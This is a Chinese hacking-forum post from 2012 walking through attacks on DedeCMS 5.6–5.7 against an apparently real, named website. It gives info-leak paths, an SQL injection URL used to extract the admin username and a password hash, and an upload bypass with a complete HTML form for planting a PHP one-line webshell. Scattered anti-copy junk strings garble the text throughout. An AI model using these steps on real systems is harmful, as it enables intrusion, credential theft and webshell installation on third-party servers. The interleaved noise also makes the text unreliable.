中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
% i: I, B) D; q3 Z( h# r8 B
这站
http://www.political-security.com/
6 j( a* c" M3 B$ C- ~, _
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
! i9 }( e' a# `
www.political-security.com/data/mysql_error_trace.inc
爆后台
j5 P" @) r5 t9 X
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
3 n) i0 _5 \- m: j
然后写上语句
# a; e5 ?* x( ]+ l
查看管理员帐号
+ q% t; t; ^: u/ K
http://www.political-security.co ... &membergroup=@`
$ V* ~; Z- t I) h
F& m$ L: o. F# I' o; v8 k
admin
; e6 ]0 `) t. b) L, q
. i% g; p5 u: c7 ~% d9 ~
查看管理员密码
: z3 e6 _$ o' ?" W" A6 a' O* T# l
http://www.political-security.co ... &membergroup=@`
: s( O$ C: {9 P8 R! J; R5 s' f
- H8 H) C, j& g% @% Y
8d29b1ef9f8c5a5af429
K: P- R0 W3 s
9 {; e8 J( o6 M+ g2 `8 R- k. o
查看管理员密码
0 b7 k( K/ {9 S6 `/ g5 V G
$ w# i9 o0 ^7 [8 N8 o
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; B' Y* Z$ Q, s& r, s
3 t4 ?1 A/ ?! W n
8d2
5 r& x% q) X5 E1 G1 X |
9b1ef9f8c5a5af42
( X# b8 Z) O! K, B6 u
9
: H& X* X% e5 @" |" H3 g$ V
' i+ ~' H7 F' n5 J/ i5 w2 |4 p" {
cmd5没解出来 只好测试第二个方法
0 s& Y; p% |2 k! U' \: G" H
4 N& E! Y! e. I+ Q
: M: i. F5 H" O9 d; W% ^6 g
②上传漏洞:
4 |( {+ w1 ~$ d" I. i+ d
; O" i: i) o) q* J/ z7 C m
只要登陆会员中心,然后访问页面链接
, ]" A# R; ]0 N/ e! V. m' @
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
/ D6 I4 V- S) b) m6 J
% c' }/ E+ l. w# o9 a" {* g1 F
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
1 E; x4 a1 B2 E# _: Q
) h+ u2 N E" n Q3 o
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
- {, T, ` l6 ]4 o$ ]
) Z/ N& C1 [ t$ l
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; y/ _ t6 Q- C7 }- m# n' c/ B
或者
6 \0 Q: o& J: l( N6 h% M! y% A% A6 Z
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2